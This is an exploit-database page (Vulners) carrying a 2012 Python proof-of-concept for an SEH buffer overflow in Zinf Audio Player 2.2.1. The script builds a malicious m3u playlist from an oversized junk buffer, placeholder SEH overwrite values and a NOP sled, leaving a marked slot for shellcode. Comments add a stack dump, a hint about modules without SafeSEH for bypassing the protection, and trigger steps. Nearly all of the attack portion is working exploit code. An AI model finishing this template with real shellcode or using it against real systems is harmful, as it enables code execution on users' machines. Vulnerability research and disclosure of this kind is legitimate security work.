Vulners
Lucene search
Zinf Audio Player (m3u file) Buffer Overflow (SEH)
#!/usr/bin/python
#Product Details:
#---------------------------------------------------------------------------------
#The Zinf audio player is a simple, but powerful audio player for Linux and Win32.
#It supports MP3, Ogg/Vorbis, WAV and Audio CD playback, SHOUTcast/Icecast
#HTTP streaming, RTP streaming, a powerful music browser, theme support
#and a download manager. Zinf is based on the FreeAmp source code. However,
#AMP is a trademark of PlayMedia Systems, Inc., and therefore the original name
#of the project cannot be used any longer.On this website the old project will
#be referred to as FreeA*p.
#---------------------------------------------------------------------------------
print ("Exploit Title: Zinf Audio Player (m3u file) Buffer Overflow Vulnerability(SEH)(POC)\n");
print ("Version: 2.2.1\n");
print ("Date: 3-18-2012\n");
print ("Author: mAniNdArK\n");
print ("Software Link: http://www.zinf.org\n");
print ("Category: Local\n");
print ("Tested on: Windows XP SP3 Professional(En)\n");
print ("Greetz To:Bedu33n,N!1l,Rex0Man,Escape X0ne,JingoBD,Annihilat0r_BD,00xnull,\n");
print ("34GL3_3Y3,5!L3NT @[email protected]!N,s1l3n7 BD,\n");
print ("Rudr0 Akash,p5YcH0 d0d93r And All The Members\n");
print ("Of Bangladesh Cyber Army(BCA)\n");
print "Mail:[email protected]"
print "---------------------------------------------------------\n";
#0198F9B4 41414141 AAAA
#0198F9B8 41414141 AAAA
#0198F9BC 41414141 AAAA
#0198F9C0 41414141 AAAA
#0198F9C4 41414141 AAAA
#0198F9C8 41414141 AAAA
#0198F9CC 41414141 AAAA
#0198F9D0 41414141 AAAA
#0198F9D4 41414141 AAAA
#0198F9D8 41414141 AAAA
#0198F9DC 41414141 AAAA
#0198F9E0 41414141 AAAA
#0198F9E4 41414141 AAAA
#0198F9E8 41414141 AAAA
#0198F9EC 41414141 AAAA
#0198F9F0 41414141 AAAA
#0198F9F4 41414141 AAAA
#0198F9F8 41414141 AAAA
#0198F9FC 42424242 BBBB Pointer to next SEH record
#0198FA00 43434343 CCCC SE handler
#0198FA08 90909090 ....
#0198FA0C 44444444 DDDD
#0198FA10 44444444 DDDD
#instruction:
#Right click and select open...
#And select playlist file poc.m3u"
file="poc.m3u"
junk="\x41"*12148
nseh="B"*4 # Address=42424242 SE handler=*** CORRUPT ENTRY *** use a short jmp here...
seh="C"*4 # Address=0198F9FC SE handler=43434343
#there are lots of modules without safeseh..like download.ui...u can use it to bypass seh..
nop="\x90"*8
shellcode="D"*1000 #shellcode will go here
try:
print "[*] Creating exploit file...\n";
writeFile = open (file, "w")
writeFile.write( junk +nseh+seh+ nop+ shellcode)
writeFile.close()
print "[*] File successfully created!";
except:
print "[!] Error while creating file!";
# 0day.today [2018-01-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Mar 2012 00:00Current
6.8Medium risk
Vulners AI Score6.8